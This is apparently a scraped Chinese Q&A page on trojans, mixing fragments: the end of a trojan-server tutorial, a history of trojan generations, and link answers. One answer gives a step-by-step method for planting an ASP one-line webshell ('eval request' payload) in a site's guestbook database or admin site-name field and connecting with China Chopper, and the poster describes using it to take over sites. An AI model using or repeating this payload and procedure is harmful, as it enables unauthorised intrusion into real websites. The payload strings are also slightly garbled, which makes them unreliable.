啊，超長的OnClientRead事件終於寫完了。最後別忘了要在此伺服器源碼文件中添加以下頭文件：
#include <stdlib.h>
#include <dirent.h>
#include <fcntl.h>
#include <dos.h>
#include <sys\stat.h>
#include <winbase.h>
#include <stdio.h>
#include <process.h>
#include <io.h>
#include <mmsystem.h>
至此，伺服器端（Server）程序

⑤ 一句話木馬怎麼插和我插了一句話木馬之後那個打開網址然後上傳代碼的網址是多少那些教程里沒有說那個地址

一句話木馬插入方法：第一種：先判斷資料庫是asp或其他格式，若為asp格式，可通過留言本向資料庫插入一句話代碼，插入後，用中國菜刀連接留言本資料庫地址（資料庫地址可以通過暴庫爆出路徑，暴不出路徑，就用工具強行掃描，看是否能掃到資料庫地址）就得到webshell了。第二種：進入網站後台，然後修改網站名，把網站名修改成一句話木馬代碼，記住，要閉合插入一句話，即

"%><%evalrequest("這里換成你喜歡設的密碼"%><%s="'閉合的一句話木馬代碼
<%evalrequest("這里換成你喜歡設的密碼"%>'未閉合的一句話木馬代碼

有一次，我進了一個網站後台，修改網站名時，沒有閉合插入一句話木馬代碼，致使後台出現了403錯誤，無法打開，白浪費了一個網站。閉合插入並保存後，用中國菜刀連接網站配置文件（配置文件路徑可以通過插入未閉合的一句話木馬代碼，不保存，點擊後台別的位置，會出現錯誤提示，下面的路徑就是網站配置文件的路徑），因為網站名等信息在網站的配置文件中，就要連接配置文件，成功後，你就得到了網站webshell了。

總之，我是這樣拿站的，希望這些方法對你有用。

⑥ 木馬是什麼

計算機世界中的特洛伊木馬病毒的名字由《荷馬史詩》的特洛伊戰記得來。故事說的是希臘人圍攻特洛伊城十年後仍不能得手，於是阿迦門農受雅典娜的啟發:把士兵藏匿於巨大無比的木馬中,然後佯作退兵。當特洛伊人將木馬作為戰利品拖入城內時，高大的木馬正好卡在城門間，進退兩難。夜晚木馬內的士兵爬出來，與城外的部隊里應外合而攻下了特洛伊城。而計算機世界的特洛伊木馬(Trojan)是指隱藏在正常程序中的一段具有特殊功能的惡意代碼，是具備破壞和刪除文件、發送密碼、記錄鍵盤和攻擊Dos等特殊功能的後門程序。

第一代木馬 ：偽裝型病毒
這種病毒通過偽裝成一個合法性程序誘騙用戶上當。世界上第一個計算機木馬是出現在1986年的PC-Write木馬。它偽裝成共享軟體PC-Write的 2.72版本（事實上，編寫PC-Write的Quicksoft公司從未發行過2.72版本），一旦用戶信以為真運行該木馬程序，那麼他的下場就是硬碟被格式化。在我剛剛上大學的時候，曾聽說我校一個前輩牛人在WAX機房上用BASIC作了一個登錄界面木馬程序，當你把你的用戶ID，密碼輸入一個和正常的登錄界面一模一樣的偽登錄界面後後，木馬程序一面保存你的ID,和密碼，一面提示你密碼錯誤讓你重新輸入，當你第二次登錄時，你已成了木馬的犧牲品。此時的第一代木馬還不具備傳染特徵。

第二代木馬 ：AIDS型木馬
繼PC-Write之後，1989年出現了AIDS木馬。由於當時很少有人使用電子郵件，所以AIDS的作者就利用現實生活中的郵件進行散播：給其他人寄去一封封含有木馬程序軟盤的郵件。之所以叫這個名稱是因為軟盤中包含有AIDS和HIV疾病的葯品，價格，預防措施等相關信息。軟盤中的木馬程序在運行後，雖然不會破壞數據，但是他將硬碟加密鎖死，然後提示受感染用戶花錢消災。可以說第二代木馬已具備了傳播特徵（盡管通過傳統的郵遞方式）。

第三代木馬：網路傳播性木馬
隨著Internet的普及，這一代木馬兼備偽裝和傳播兩種特徵並結合TCP/IP網路技術四處泛濫。同時他還有新的特徵：
第一，添加了「後門」功能。
所謂後門就是一種可以為計算機系統秘密開啟訪問入口的程序。一旦被安裝，這些程序就能夠使攻擊者繞過安全程序進入系統。該功能的目的就是收集系統中的重要信息，例如，財務報告、口令及信用卡號。此外，攻擊者還可以利用後門控制系統，使之成為攻擊其它計算機的幫凶。由於後門是隱藏在系統背後運行的，因此很難被檢測到。它們不像病毒和蠕蟲那樣通過消耗內存而引起注意。
第二，添加了擊鍵記錄功能。
從名稱上就可以知道，該功能主要是記錄用戶所有的擊鍵內容然後形成擊鍵記錄的日誌文件發送給惡意用戶。惡意用戶可以從中找到用戶名、口令以及信用卡號等用戶信息。這一代木馬比較有名的有國外的BO2000（BackOrifice）和國內的冰河木馬。它們有如下共同特點：基於網路的客戶端/伺服器應用程序。具有搜集信息、執行系統命令、重新設置機器、重新定向等功能。
當木馬程序攻擊得手後，計算機就完全在黑客控制的傀儡主機，黑客成了超級用戶，用戶的所有計算機操作不但沒有任何秘密而言，而且黑客可以遠程式控制制傀儡主機對別的主機發動攻擊，這時候背俘獲的傀儡主機成了黑客進行進一步攻擊的擋箭牌和跳板。

⑦ 如何上傳木馬

去黑客學習 基地，那裡有免費教程

⑧ 英雄聯盟登陸感染木馬

英雄聯盟登陸感染木馬的解決方法：

1、電腦安裝AVAST殺毒和360，通過檢測並沒有木馬...

⑨ 求上傳ASP木馬教程

http://www.3hack.com/Software/Catalog6/1470.html
http://www.bawang.cn/soft/14/335/379/2006/2006051028822.html